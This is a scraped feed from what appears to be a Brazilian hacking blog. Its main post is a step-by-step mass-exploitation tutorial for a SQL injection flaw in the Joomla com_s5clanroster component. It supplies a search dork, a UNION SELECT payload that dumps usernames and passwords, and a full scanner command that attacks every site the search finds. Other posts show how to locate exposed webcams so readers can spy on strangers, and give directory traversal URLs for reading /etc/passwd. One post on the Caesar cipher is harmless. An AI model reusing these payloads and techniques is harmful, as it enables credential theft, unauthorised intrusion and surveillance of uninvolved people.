InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com1tag:blogger.com,1999:blog-5670232360751087799.post-62689872321613979692015-07-06T22:02:00.000-03:002015-07-19T19:38:00.553-03:00Joomla S5 Clan Roster com_s5clanroster SQL Injection exploit<h3 style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>EXPLOIT MASS Joomla - com_s5clanroster</b></span></h3>
<h3 style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>USE INURLBR</b></span></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3Dp0gAFoPC0jwYeauGkkRTzKdB7FKT94ecK8grqbr1K0bwYQtXjnQsnZ7-aP5VEtBAkG20YRLSljq004NLDXM-uegfNNmu1MvesI281As9BtJoujZQ3MMHNGFCRgEZ_evg3hNe72m2RYM/s1600/hqdefault.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="In this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal. The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information." border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj3Dp0gAFoPC0jwYeauGkkRTzKdB7FKT94ecK8grqbr1K0bwYQtXjnQsnZ7-aP5VEtBAkG20YRLSljq004NLDXM-uegfNNmu1MvesI281As9BtJoujZQ3MMHNGFCRgEZ_evg3hNe72m2RYM/s400/hqdefault.jpg" title="In this tutorial we will use the inurlbr tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal. The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (script), Where injected successfully is possible to have access to the target server database information." width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
In this tutorial we will use the <a href="http://blog.inurl.com.br/search/label/inurlbr#uds-search-results" target="_blank">inurlbr</a> tool to find targets and then inject our string of exploration, We will use internal functions of inurlbr script to convert injection string in hexadecimal.<br />
<br />
The com_s5clanroster compenet has a SQL injection flaw in their GET parameter "id", This article is based on the script written by the hacker TheLooper (<a href="http://pastebin.com/kaczrhus" target="_blank"><b>script</b></a>), Where injected successfully is possible to have access to the target server database information.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>DORK:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">inurl:"index.php?option=com_s5clanroster"</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>SQL INJECTION:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(username,0x3a,password),222+from+jos_users--%20-</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>POC:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null<b>{SQL INJECTION}</b></span><br />
<br />
With access to this information we put together our command for mass exploitation.<br />
<b>Let's use the scanner inurlbr: </b><br />
<a href="http://github.com/googleinurl/SCANNER-INURLBR">http://github.com/googleinurl/SCANNER-INURLBR</a><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>SET DORK:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--dork 'inurl:"index.php?option=com_s5clanroster"'</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>SET FILE OUTPUT:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">-s vuln.log</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>SET TIPE VALIDATION:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">-t 3</span><br />
<i> 3 - The third type combine both first and second types:</i><br />
<i> Then, of course, it also establishes connection with the exploit through the get method</i><br />
<i> Demo: www.target.com.br{exploit}</i><br />
<div>
<br /></div>
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>SET EXPLOIT REQUEST - GET:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get {YOU_GET}</span><br />
<br />
<i>Before setting the <span style="font-family: Times, Times New Roman, serif;">exploit</span> we get to manipulate its string, for that we use a domestic function of inurlbr scanner so passes a validation string within the SQL injection to be able to separate vulnerable targets.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Internal function - Converting strings in hexadecimal</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><b>hex</b> Encrypt values in hex.</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Example: <b><span style="color: red;">hex(</span></b><i>{value}</i><b><span style="color: red;">)</span></b></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>hex(</b><i>102030</i><b>)</b></span></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;">--exploit-get 'user?id=<b>hex(</b><i>102030</i><b>)</b>'</span><br /> Result inject:<br /> http://www.target.gov.br/user?id=<i>313032303330</i></span><br />
<div>
<br /></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;">--exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x<b>hex(</b>inurlbr_vuln<b>)</b>,username,password,0x<b>hex(</b><br><b>)</b>),222+from+jos_users--%20-'</span></div>
<div>
<br /></div>
<div>
<b>hex(inurlbr_vuln)</b> = <i>696e75726c62725f76756c6e </i></div>
<div>
<b>hex(<br>) </b>= <i>3c62723e</i></div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Example injection:</span></b></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">http://www.target.gov.br/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(<b>0x<i>696e75726c62725f76756c6e</i></b>,username,password,<b>0x<i>3c62723e</i></b>),222+from+jos_users--%20-'</span></div>
<div>
<br /></div>
<div>
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: x-large;">SET </b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>STRING VALIDATION:</b></span></div>
<div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Specify the string that will be used on the search script:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Example: -a {string}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Usage: <span style="color: red;"><b>-a</b> '<title>hello world</title>'</span></span></div>
<div>
<span style="font-family: Times, Times New Roman, serif;">If specific value is found in the target he is considered vulnerable</span><span style="font-family: Courier New, Courier, monospace;">.</span></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Setting:</b></span><span style="font-family: Courier New, Courier, monospace;"> </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>-a</b> 'inurlbr_vuln'</span></div>
<div>
Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmy-96VIj5FYUXbhItxAD3FP3P6bYtZiW4suWX2KcQZCJjPMEnm31-e0th5jAQ_Pklad2cxRvB4boiXKO-Hg8IkA6kOJTqYc_bBQ-hF5IgfUOqaQD-bYaHEi3BQq5vEBUcyPCdVXjFdF7W/s1600/Captura+de+tela+de+2015-07-06+21%253A39%253A46.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="SET STRING VALIDATION: Specify the string that will be used on the search script: Example: -a {string} Usage: -a '<title>hello world</title>' If specific value is found in the target he is considered vulnerable. Setting: -a 'inurlbr_vuln' Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected." border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmy-96VIj5FYUXbhItxAD3FP3P6bYtZiW4suWX2KcQZCJjPMEnm31-e0th5jAQ_Pklad2cxRvB4boiXKO-Hg8IkA6kOJTqYc_bBQ-hF5IgfUOqaQD-bYaHEi3BQq5vEBUcyPCdVXjFdF7W/s640/Captura+de+tela+de+2015-07-06+21%253A39%253A46.png" title="SET STRING VALIDATION: Specify the string that will be used on the search script: Example: -a {string} Usage: -a '<title>hello world</title>' If specific value is found in the target he is considered vulnerable. Setting: -a 'inurlbr_vuln' Let's validate the string "inurlbr_vuln" as she passed within the SQLI exploit, if such value appear on our target was successfully injected." width="640" /></a></div>
<div>
<br /></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>COMMAND FULL:</b></span></div>
<div>
<span style="color: red; font-family: 'Courier New', Courier, monospace;">php inurlbr.php <b>--dork</b> 'inurl:"index.php?option=com_s5clanroster"' </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>-s</b> vuln.log </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>-t</b> 3 </span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>--exploit-get</b> '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0x</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">hex(</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">inurlbr_vuln</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">)</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">,username,password,0x</span><b style="color: red; font-family: 'Courier New', Courier, monospace;">hex(</b><span style="color: red; font-family: 'Courier New', Courier, monospace;"><br></span><b style="color: red; font-family: 'Courier New', Courier, monospace;">)</b><span style="color: red; font-family: 'Courier New', Courier, monospace;">),222+from+jos_users--%20-'</span></div>
<div>
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> 'inurlbr_vuln'</span><br />
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">PRINT PROCESS:</span></b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgtChH9XJ3fgMJ9OxwI2keipbfI2BhcoHHPggFMfJX1OowWE7K4Px_UotPMeX2Ij2KEOiTx7NVYWnX6NzUJsooOYVzUocXYt3UhBvpqgG_LH5UyEZ8LqjjkVAOBxKlL7ZPptEsnAbe9ULy/s1600/Captura+de+tela+de+2015-07-06+21%253A56%253A27.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="COMMAND FULL: php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-' PRINT PROCESS:" border="0" height="359" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgtChH9XJ3fgMJ9OxwI2keipbfI2BhcoHHPggFMfJX1OowWE7K4Px_UotPMeX2Ij2KEOiTx7NVYWnX6NzUJsooOYVzUocXYt3UhBvpqgG_LH5UyEZ8LqjjkVAOBxKlL7ZPptEsnAbe9ULy/s640/Captura+de+tela+de+2015-07-06+21%253A56%253A27.png" title="COMMAND FULL: php inurlbr.php --dork 'inurl:"index.php?option=com_s5clanroster"' -s vuln.log -t 3 --exploit-get '/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null%27+/*!50000UnIoN*/+/*!50000SeLeCt*/+group_concat(0xhex(inurlbr_vuln),username,password,0xhex(<br>)),222+from+jos_users--%20-' PRINT PROCESS:" width="640" /></a></div>
<div>
<br /></div>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com6tag:blogger.com,1999:blog-5670232360751087799.post-75383743812069142472015-07-06T16:36:00.002-03:002015-07-06T20:50:04.522-03:00Cifra de César <h3 style="text-align: center;">
<span style="font-size: large;"><b> #Cifra de César em Python </b></span></h3>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh91VbPuvmmF_7qvqrblp7C14BArTdMECPt1OZB71bqGTGCjJB2EO6XD0i3rPM5RRYDcbubValOhHX4bH3V-oi5MDpUiyY0UMT7j-MWYeVHh1tmBvccTxCjBp5JkwXGW8QWr7V6oGTPwWY/s1600/cicada.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" Neste ultimo fim de semana, eu estava pesquisando sobre uma organização chamada Cicada 3301 que tem como principal objetivo o recrutamento de usuários altamente inteligentes em todo o mundo para um objetivo totalmente desconhecido. Uma espécie de (quebra-cabeça, desafio, enigma) ou como você quiser chamar era o método de recrutamento da Cicada 3301 (Mas informações). Pesquisando sobre os tipos de desafios que a cicada utilizava, um deles era codificação de mensagens usando a clássica Cifra de César (Júlio César a usava para passar informações confidenciais nos tempos de Roma). A Cifra de César era basicamente o seguinte, Era a substituição das letras da mensagem a ser criptografada por seus sucessores no alfabeto de acordo com a sua chave." border="0" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh91VbPuvmmF_7qvqrblp7C14BArTdMECPt1OZB71bqGTGCjJB2EO6XD0i3rPM5RRYDcbubValOhHX4bH3V-oi5MDpUiyY0UMT7j-MWYeVHh1tmBvccTxCjBp5JkwXGW8QWr7V6oGTPwWY/s640/cicada.jpg" title=" Neste ultimo fim de semana, eu estava pesquisando sobre uma organização chamada Cicada 3301 que tem como principal objetivo o recrutamento de usuários altamente inteligentes em todo o mundo para um objetivo totalmente desconhecido. Uma espécie de (quebra-cabeça, desafio, enigma) ou como você quiser chamar era o método de recrutamento da Cicada 3301 (Mas informações). Pesquisando sobre os tipos de desafios que a cicada utilizava, um deles era codificação de mensagens usando a clássica Cifra de César (Júlio César a usava para passar informações confidenciais nos tempos de Roma). A Cifra de César era basicamente o seguinte, Era a substituição das letras da mensagem a ser criptografada por seus sucessores no alfabeto de acordo com a sua chave." width="640" /></a></div>
<br />
Eae seus putos, <a href="https://twitter.com/jh00nbr">jh00n</a> aqui novamente com vocês.<br />
<br />
Neste ultimo fim de semana, eu estava pesquisando sobre uma organização chamada <b>Cicada 3301</b> que tem como principal objetivo o recrutamento de usuários altamente inteligentes em todo o mundo para um objetivo totalmente desconhecido. Uma espécie de (quebra-cabeça, desafio, enigma) ou como você quiser chamar era o método de recrutamento da<b> Cicada 3301</b> <a href="http://www.medob.com.br/2015/03/cicada-3301.html" target="_blank">(Mas informações)</a>. Pesquisando sobre os tipos de desafios que a cicada utilizava, um deles era codificação de mensagens usando a clássica Cifra de César (<a href="https://pt.wikipedia.org/wiki/J%C3%BAlio_C%C3%A9sar" target="_blank">Júlio César</a> a usava para passar informações confidenciais nos tempos de Roma).<br />
<br />
A Cifra de César era basicamente o seguinte, Era a substituição das letras da mensagem a ser criptografada por seus sucessores no alfabeto de acordo com a sua chave.<br />
<br />
<ul>
<li> <span style="font-size: large;"><b>Criptografando </b></span></li>
</ul>
Chave 3<br />
Alfabeto: "abcdefghijklmnopqrstuvwxyz"<br />
Mensagem a ser criptografada: "aka"<br />
<br />
Neste caso você conta 3(Chave) casas a frente das letras "a","k","a" ficando assim: dnd. <br />
<ul>
<li> <span style="font-size: large;"><b>Descriptografando </b></span></li>
</ul>
Chave 3<br />
Mensagem a ser descriptografada: "dnd"<br />
<br />
Funciona basicamente ao contrario você só ira precisar da chave, neste caso você conta 3 casa<br />
para trás retornando a mensagem original: aka. <br />
<br />
<br />
Então decidir fazer um programa em Python que encripta e decripta frases utilizando a Cifra de César.<br />
<a href="https://github.com/jh00nbr/Python/blob/master/cifradecesar.py" target="_blank">https://github.com/jh00nbr/Python/blob/master/cifradecesar.py </a><br />
<br />
<script src="https://gist.github.com/jh00nbr/42ca35645d2176eb6844.js"></script>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-5670232360751087799.post-6641176597487627802015-07-06T10:05:00.002-03:002015-07-17T11:24:04.008-03:00Looking webcam<div style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Big Brother small</b></span></div>
<br />
Human Everybody is curious and likes to eavesdrop on other people's lives, I created this little tutorial to help curisos deem webcans.<br />
We will use simple techniques of <a href="http://blog.inurl.com.br/2012/12/mundo-inurl-conceitoprincipais.html" target="_blank">Dorking</a> and strings of validation within the inurlbr scanner.<br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">DORK 1</span></b><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="color: red;">inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW9joQrotY_-Ru3TPVgWwYAefhXiS7qO-R4XlHy8e6n_dcKuqouqgPaaQf7JpBpYYGjw-nBfpLFx-_7GkznD2BJCxKQHfxRlpUUeSSeDqeTf90O4qo7hN_Vh0U-OQbc28gs8uXBLODLHjE/s1600/Captura+de+tela+de+2015-07-06+09%253A09%253A09.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt=" Human Everybody is curious and likes to eavesdrop on other people's lives, I created this little tutorial to help curisos deem webcans. We will use simple techniques of Dorking and strings of validation within the inurlbr scanner. DORK 1 inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"" border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhW9joQrotY_-Ru3TPVgWwYAefhXiS7qO-R4XlHy8e6n_dcKuqouqgPaaQf7JpBpYYGjw-nBfpLFx-_7GkznD2BJCxKQHfxRlpUUeSSeDqeTf90O4qo7hN_Vh0U-OQbc28gs8uXBLODLHjE/s640/Captura+de+tela+de+2015-07-06+09%253A09%253A09.png" title=" Human Everybody is curious and likes to eavesdrop on other people's lives, I created this little tutorial to help curisos deem webcans. We will use simple techniques of Dorking and strings of validation within the inurlbr scanner. DORK 1 inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"" width="640" /></a></div>
<br />
<a href="http://blog.inurl.com.br/2010/08/bd-string-busca-cameras.html" target="_blank">More search strings</a><br />
<br />
<span style="font-size: large;">Open <a href="http://blog.inurl.com.br/2011/01/busca-de-webcans-online.html" target="_blank">webcam</a>...</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihsOpfv_rHjglTIfBgbEieSpDiSiCmMQcqP5ldhgm2uECOClwS83IGOnAFWAm1xnDcYT_Fp_Zdvz2vsUmIQkoxS_QFkE_eJW_p1TTaA_mlN591P2Hhlk8BKe4-Bn0G3xAxnftIyvPIge-3/s1600/Captura+de+tela+de+2015-07-06+09%253A17%253A44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihsOpfv_rHjglTIfBgbEieSpDiSiCmMQcqP5ldhgm2uECOClwS83IGOnAFWAm1xnDcYT_Fp_Zdvz2vsUmIQkoxS_QFkE_eJW_p1TTaA_mlN591P2Hhlk8BKe4-Bn0G3xAxnftIyvPIge-3/s640/Captura+de+tela+de+2015-07-06+09%253A17%253A44.png" width="640" /></a></div>
<br />
<br />
Now let's search mass webcam with the help of inurlbr scanner.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>CAMMAND INURLBR </b></span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET DORK:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>--dork</b> 'inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"' </span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET OUTPUT:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-s</b> can.log </span><br />
<br />
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET LEVEL TESTS STRINGS:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-t</b> 2 </span><br />
<i> 2 - The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'</i><br />
<i><br /></i>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">SET STRING TO BE SOUGHT WITHIN EACH TARGET:</span></b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> 'Network Camera'</span><br />
or<br />
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> '<title>Network Camera'</span><br />
<br />
<div class="separator" style="clear: both; text-align: left;">
</div>
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbW_IiKgm71UDKHMNLcYJuTqe_GwuDtqWJM8pMBUqm8r5SS7LUtBroi9xEeTovSgN657xx6-SyGZGEuDppuCrPHedXYH5qEF0H1quIJADNMEXDpOIJj4JHbQUrtdo6Wx665UTUjWUWR5ID/s1600/Captura+de+tela+de+2015-07-06+09%253A28%253A02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="this parameter will enter into the URL and validate if there is the desired string." border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbW_IiKgm71UDKHMNLcYJuTqe_GwuDtqWJM8pMBUqm8r5SS7LUtBroi9xEeTovSgN657xx6-SyGZGEuDppuCrPHedXYH5qEF0H1quIJADNMEXDpOIJj4JHbQUrtdo6Wx665UTUjWUWR5ID/s400/Captura+de+tela+de+2015-07-06+09%253A28%253A02.png" title="this parameter will enter into the URL and validate if there is the desired string." width="400" /></a></div>
<div style="text-align: left;">
<b>Another example of validation</b></div>
<div style="text-align: left;">
<span style="color: red; font-family: Courier New, Courier, monospace;"><b>-a</b> 'Resolution='</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPaPAjea5cd-98j441GjDKnFh-h-J3jvaohAXjIvCKs7AptlE0Or8tFkQtClOL5S6zLoAw-ywTyq0Ke73BTjJxS4ljJyI3BbqPPyGYANg7TeyCnS5zkledzfs_V3A7yZbrj3E-11obzC7B/s1600/Captura+de+tela+de+2015-07-06+09%253A39%253A44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Recommend using validation -a 'Resolution=' All webcam should set a resolution and not necessarily a title.. This parameter will enter into the URL and validate if there is the desired string." border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPaPAjea5cd-98j441GjDKnFh-h-J3jvaohAXjIvCKs7AptlE0Or8tFkQtClOL5S6zLoAw-ywTyq0Ke73BTjJxS4ljJyI3BbqPPyGYANg7TeyCnS5zkledzfs_V3A7yZbrj3E-11obzC7B/s400/Captura+de+tela+de+2015-07-06+09%253A39%253A44.png" title="Recommend using validation -a 'Resolution=' All webcam should set a resolution and not necessarily a title.. This parameter will enter into the URL and validate if there is the desired string." width="400" /></a></div>
<br />
Recommend using validation <b>-a 'Resolution='</b> All webcam should set a resolution and not necessarily a title.<br />
<div class="separator" style="clear: both; text-align: left;">
This parameter will enter into the URL and validate if there is the desired string.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Command full:</span></b></div>
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php --dork 'inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"' -s can.log -t 2 -a 'Resolution=' </span><br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">PRINT OUTPUT SCANNER INURLBR VALIDATION:</span></b><br />
<div style="text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir40tBGIOzvOHF-_4qBFEWao2ygq97CvrHTb154UoMyEehECxHXc380rIpgzRM_I_GFEnk5LmIvce6bnG6jbHuNsUzokd-AwVX0feZN8Z7CqD3tnWhG1qRRKl0GBNWfOwieQZ52FEcJAFf/s1600/Captura+de+tela+de+2015-07-06+09%253A49%253A17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Command full: php inurlbr.php --dork 'inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"' -s can.log -t 2 -a 'Resolution=' PRINT OUTPUT SCANNER INURLBR VALIDATION:" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir40tBGIOzvOHF-_4qBFEWao2ygq97CvrHTb154UoMyEehECxHXc380rIpgzRM_I_GFEnk5LmIvce6bnG6jbHuNsUzokd-AwVX0feZN8Z7CqD3tnWhG1qRRKl0GBNWfOwieQZ52FEcJAFf/s640/Captura+de+tela+de+2015-07-06+09%253A49%253A17.png" title="Command full: php inurlbr.php --dork 'inurl:"ViewerFrame?Mode=Refresh" & " Image Size" & intitle:"Network Camera"' -s can.log -t 2 -a 'Resolution=' PRINT OUTPUT SCANNER INURLBR VALIDATION:" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">OUT PUT TERMINAL VIDEO:</span></b></div>
<iframe height="480" src="http://showterm.io/3b6c37d103c73b740886d#fast" width="100%"></iframe>
<br />
<b>More dorsk webcan.</b><br />
<div class="separator" style="clear: both; text-align: left;">
<a href="http://blog.inurl.com.br/2010/08/bd-string-busca-cameras.html">http://blog.inurl.com.br/2010/08/bd-string-busca-cameras.html</a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=0&ghdb_search_text=webcam" target="_blank">https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=0&ghdb_search_text=webcam</a></div>
InurlBRhttp://www.blogger.com/profile/12688503833321390298noreply@blogger.com0tag:blogger.com,1999:blog-5670232360751087799.post-10025353991758089312015-07-05T15:21:00.000-03:002015-11-19T21:39:42.164-02:00Tool lfiINURL - exploring Local File Inclusion<div style="text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: large;"><b>lfiINURL</b></span></div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>Tool Description</b></span><br />
<br />
The script runs tests searching for the directory that contains the password file server / directory traversal Exemple:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggj__seTZGTyMHsud-jy3JpiLgk6jn9sPqTQfj3rj6h5OtrTEigS27eRL3Jm4F5SvywMtP7QIqrKD6z1Okdf2T4KuE2Un8EYNdHSN6rnqHALFIhFACT2cNTcabT20sbQPZy6clTmcFAyU/s1600/hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Tool Description The script runs tests searching for the directory that contains the password file server / directory traversal Exemple:" border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggj__seTZGTyMHsud-jy3JpiLgk6jn9sPqTQfj3rj6h5OtrTEigS27eRL3Jm4F5SvywMtP7QIqrKD6z1Okdf2T4KuE2Un8EYNdHSN6rnqHALFIhFACT2cNTcabT20sbQPZy6clTmcFAyU/s1600/hacked.png" title="Tool Description The script runs tests searching for the directory that contains the password file server / directory traversal Exemple:" width="400" /></a></div>
<br />
<pre><span style="font-family: "courier new" , "courier" , monospace;">http://target.br/file.php?open=<b>/etc/passwd</b>
http://target.br/file.php?open=<b>../etc/passwd</b>
http://target.br/file.php?open=<b>../../etc/passwd</b>
http://target.br/file.php?open=<b>../../../etc/passwd</b>
http://target.br/file.php?open=<b>../../../../etc/passwd</b></span>
AUTOR: googleINURL
EMAIL: inurlbr@gmail.com
Blog: <a href="http://blog.inurl.com.br/">http://blog.inurl.com.br</a>
Twitter: <a href="https://twitter.com/googleinurl" target="_blank">https://twitter.com/googleinurl</a>
Fanpage: <a href="https://fb.com/InurlBrasil" target="_blank">https://fb.com/InurlBrasil</a>
Pastebin <a href="http://pastebin.com/u/Googleinurl" target="_blank">http://pastebin.com/u/Googleinurl</a>
GIT: <a href="https://github.com/googleinurl" target="_blank">https://github.com/googleinurl</a>
PSS: <a href="http://packetstormsecurity.com/user/googleinurl" target="_blank">http://packetstormsecurity.com/user/googleinurl</a>
YOUTUBE: <a href="http://youtube.com/c/INURLBrasil" target="_blank">http://youtube.com/c/INURLBrasil</a>
PLUS: <a href="http://google.com/+INURLBrasil" target="_blank">http://google.com/+INURLBrasil</a>
</pre>
